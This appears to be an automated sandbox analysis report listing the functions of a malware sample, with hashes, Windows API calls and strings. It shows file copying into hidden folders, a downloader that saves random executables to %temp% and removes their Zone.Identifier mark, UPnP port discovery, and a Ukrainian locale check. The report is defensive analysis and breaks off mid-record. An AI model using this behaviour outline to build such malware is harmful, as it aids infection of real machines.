Opcode Fuzzy Hash: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
Instruction Fuzzy Hash: 582275B1B80318BBE7209B90DC4AFE97775AB4CB05F5080A9B305BA1D1D6F4A984CF5D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406650 Relevance: 73.8, APIs: 32, Strings: 10, Instructions: 293
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_chkstk.NTDLL(?,00406CA0,?,?,?), ref: 00406658
wsprintfW.USER32 ref: 0040668F
wsprintfW.USER32 ref: 004066AF
wsprintfW.USER32 ref: 004066CF
wsprintfW.USER32 ref: 004066EF
wsprintfW.USER32 ref: 00406708
PathFileExistsW.SHLWAPI(?), ref: 00406718
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
DeleteFileW.KERNEL32(?), ref: 0040675E
PathFileExistsW.SHLWAPI(?), ref: 0040676B
PathFileExistsW.SHLWAPI(?), ref: 0040677C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040678F
SetFileAttributesW.KERNEL32(?,00000002), ref: 004067A2
PathFileExistsW.SHLWAPI(?), ref: 004067AF
CopyFileW.KERNEL32(00416C68,?,00000000), ref: 004067C7
SetFileAttributesW.KERNEL32(?,00000002), ref: 004067DA

Strings

shell32.dll, xrefs: 004067FB
shell32.dll, xrefs: 00406813
%s\%s, xrefs: 004066E3
%s.lnk, xrefs: 00406683
%s\%s\%s, xrefs: 00406AA8
%s\%s\VolDriver.exe, xrefs: 004066C3
%s\%s, xrefs: 00406A0E
%s\*, xrefs: 004066FC
%s\%s, xrefs: 004066A3
%s\%s, xrefs: 00406A81

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
API String ID: 3833403615-1812021906
Opcode ID: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
Instruction ID: e2ecd58a7cdb3ddabc66963e241761916e5e8b01b4df26f84105cefa3cc8d735
Opcode Fuzzy Hash: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
Instruction Fuzzy Hash: 33D17475900258ABCB20DF60DD44FEA77B8BB48704F00C5E9F20AA6191D7B99BD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406510 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00406ADB,00000000), ref: 0040651F
wsprintfW.USER32 ref: 00406535
FindFirstFileW.KERNEL32(?,?), ref: 0040654C
lstrcmpW.KERNEL32(?,00410FEC), ref: 00406571
lstrcmpW.KERNEL32(?,00410FF0), ref: 00406587
wsprintfW.USER32 ref: 004065AA
wsprintfW.USER32 ref: 004065CA
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
FindClose.KERNEL32(000000FF), ref: 0040662F
RemoveDirectoryW.KERNEL32(?), ref: 00406639

Strings

%s\*, xrefs: 00406529
%s\%s, xrefs: 0040659E
%s\%s, xrefs: 004065BE

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
Instruction ID: 675ada4a5424986e6cd9ec47b4399dcfcf89a647db31862166f89cf1cb76b4cd
Opcode Fuzzy Hash: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
Instruction Fuzzy Hash: E33178B5900218AFCB10DB60EC89FDA7778AB48301F00C5A9F609A3185DB75DAD9CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040D370: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D38E

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040D3A0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
Part of subcall function 0040D3A0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
Part of subcall function 0040D3A0: DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
Part of subcall function 0040D3A0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
Instruction ID: df8ad55f307143f3a92c653802a821764c0c55d7be8f2a3f3e8fe1ebc27bb844
Opcode Fuzzy Hash: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
Instruction Fuzzy Hash: 3F41AF70640701ABD3309F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E845875A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D950 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
htons.WS2_32(0000076C), ref: 0040D9A0
inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD

Part of subcall function 0040ACC0: htons.WS2_32(00000050), ref: 0040ACED
Part of subcall function 0040ACC0: socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
Part of subcall function 0040ACC0: connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
Part of subcall function 0040ACC0: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58

bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45

Part of subcall function 0040DAD0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
Part of subcall function 0040DAD0: Sleep.KERNEL32(000003E8), ref: 0040DB2E
Part of subcall function 0040DAD0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
Part of subcall function 0040DAD0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
Part of subcall function 0040DAD0: StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E

Strings

239.255.255.250, xrefs: 0040D9AA

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250
API String ID: 726339449-2186272203
Opcode ID: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
Instruction ID: 776be564c15d3a67ad3e8e206458624d982b0507424591c965b87a75806c6374
Opcode Fuzzy Hash: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
Instruction Fuzzy Hash: 1541E9B4E04208ABDB14DFE4D889BEEBBB5AF48304F108169E505B7390E7B55A44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
Instruction ID: 9f6d7f02e8121356806164c5164031e4b64ed467ed2b657d4572fa9387097a74
Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
Instruction Fuzzy Hash: E131C871A44301AFE320DF649C46F9BB6E0AF48B10F40493DF695EB2E0D3B5D544879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF30 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040CF42
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CF68
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CF9F
GetTickCount.KERNEL32 ref: 0040CFB4
Sleep.KERNEL32(00000001), ref: 0040CFD4
GetTickCount.KERNEL32 ref: 0040CFDA

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
Instruction ID: 1a678e6439685295adbdd864bb1f175a680e3ab9afc47d2c7bf7927640be176d
Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
Instruction Fuzzy Hash: B031FE7490020EEFCF04DFA4D988AEE77B1FF44315F108669E815A72D0D7749A90CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040ACED

Part of subcall function 0040AC80: inet_addr.WS2_32(0040AD01), ref: 0040AC8A
Part of subcall function 0040AC80: gethostbyname.WS2_32(?), ref: 0040AC9D

socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58

Strings

www.update.microsoft.com, xrefs: 0040ACF7

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
Instruction ID: ba3e2b0e6fec23725a126dc2d5d77dfcfe6771dbae9c9e174257d4c79807ff88
Opcode Fuzzy Hash: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
Instruction Fuzzy Hash: BA210BB5E103099BDB04DFF8D946AEEBBB5AF08300F108169E515F7390E7745A44CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(~|@,00000000,00000000,00000001,F0000040,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0D3
CryptGenRandom.ADVAPI32(~|@,?,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0E9
CryptReleaseContext.ADVAPI32(~|@,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0F5

Strings

~|@, xrefs: 0040C0CF, 0040C0E5, 0040C0F1, 0040C0D2, 0040C0E8, 0040C0F4

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: ~|@
API String ID: 1815803762-1417210658
Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
Instruction ID: 64b452c5f04e5b6757705d6885a7ff86aea398e2a213dd3f660bad642ac62f97
Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
Instruction Fuzzy Hash: F6E01275654208FBDB24CFD5EC49FDA776CAB48700F108154F709A7190DAB5EA40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
Instruction ID: 53638d0e5b86ff224420f1c7f9a69720ea7b841d4339b56c2ae1fb68745f7462
Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
Instruction Fuzzy Hash: CA11B974A40710AFE360DF749C0AF877AE0AF04B14F50892DF599E72E1E3F49544878A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075B8), ref: 0040E983
strcmp.NTDLL ref: 0040E992

Strings

UKR, xrefs: 0040E989

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
Instruction ID: aa0b77ea91eb2b23b28eec9c342f5ca45138d15d753f47792771d9b4db2dab4a
Opcode Fuzzy Hash: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
Instruction Fuzzy Hash: FEE0C272A4430876DA10A6A1AE03BAA771C5F11701F000076AF04A61C1E9B9962992DB

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED20 Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 235
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040ED29
srand.MSVCRT ref: 0040ED30
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040ED50
strlen.NTDLL ref: 0040ED5A
mbstowcs.NTDLL ref: 0040ED71
rand.MSVCRT ref: 0040ED79
rand.MSVCRT ref: 0040ED8D
wsprintfW.USER32 ref: 0040EDB4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EDCA
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EDF9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EE28
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EE5B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EE8C
CloseHandle.KERNEL32(000000FF), ref: 0040EE9B
wsprintfW.USER32 ref: 0040EEB4
DeleteFileW.KERNEL32(?), ref: 0040EEC4
Sleep.KERNEL32(000003E8), ref: 0040EECF
Sleep.KERNEL32(000007D0), ref: 0040EEF0
ExitProcess.KERNEL32 ref: 0040EF18
DeleteFileW.KERNEL32(?), ref: 0040EF2E
CloseHandle.KERNEL32(000000FF), ref: 0040EF3B
InternetCloseHandle.WININET(00000000), ref: 0040EF48
InternetCloseHandle.WININET(00000000), ref: 0040EF55
Sleep.KERNEL32(000003E8), ref: 0040EF60
rand.MSVCRT ref: 0040EF75
Sleep.KERNEL32 ref: 0040EF8C
rand.MSVCRT ref: 0040EF92
rand.MSVCRT ref: 0040EFA6
wsprintfW.USER32 ref: 0040EFCD
DeleteUrlCacheEntryW.WININET(?), ref: 0040EFDD
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040EFF7
wsprintfW.USER32 ref: 0040F017
DeleteFileW.KERNEL32(?), ref: 0040F027
Sleep.KERNEL32(000003E8), ref: 0040F032
Sleep.KERNEL32(000007D0), ref: 0040F053
ExitProcess.KERNEL32 ref: 0040F07A
DeleteFileW.KERNEL32(?), ref: 0040F089

Strings

%s\%d%d.exe, xrefs: 0040EFC1
%s:Zone.Identifier, xrefs: 0040F00B
%s\%d%d.exe, xrefs: 0040EDA8
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EDC5
%s:Zone.Identifier, xrefs: 0040EEA8
%temp%, xrefs: 0040ED4B

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
API String ID: 3526668077-2417596247
Opcode ID: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
Instruction ID: ad06c6bce1eeec4b269cf6b178fa0be949fbab599c126aebf23d2838ae6487db
Opcode Fuzzy Hash: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
Instruction Fuzzy Hash: 8291EBB1940318ABE720DB61DC49FEA3379BB88701F0484B9F209A51C1DAB99AD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B010: gethostname.WS2_32(?,00000100), ref: 0040B02C
Part of subcall function 0040B010: gethostbyname.WS2_32(?), ref: 0040B03E

strcmp.NTDLL ref: 0040B110

Strings

.192., xrefs: 0040B1BC
.127., xrefs: 0040B15D
0.0.0.0, xrefs: 0040B0FE
.127, xrefs: 0040B13F
.10, xrefs: 0040B1FD
.10., xrefs: 0040B21B
127., xrefs: 0040B121
10., xrefs: 0040B1DF
192., xrefs: 0040B180
.192, xrefs: 0040B19E

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
Instruction ID: 14285435020103c943bf7af990fcf7992b9b4842fd13eaff794dfd4de82f65c2
Opcode Fuzzy Hash: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
Instruction Fuzzy Hash: 5061A3B5904304A7DB10EF65DC4AAAE3B74AB50348F14843AEC05773D2E73DEA54C69E

Uniqueness

Uniqueness Score: -1.00%

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

ilci, xrefs: 004019E1
PCOI, xrefs: 0040198A

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
Instruction ID: 30acf59a4b92f93f505059f31b2171fe0b1c4ce4dbffa3032f64cc39e79a13a9
Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
Instruction Fuzzy Hash: E241F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E730 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

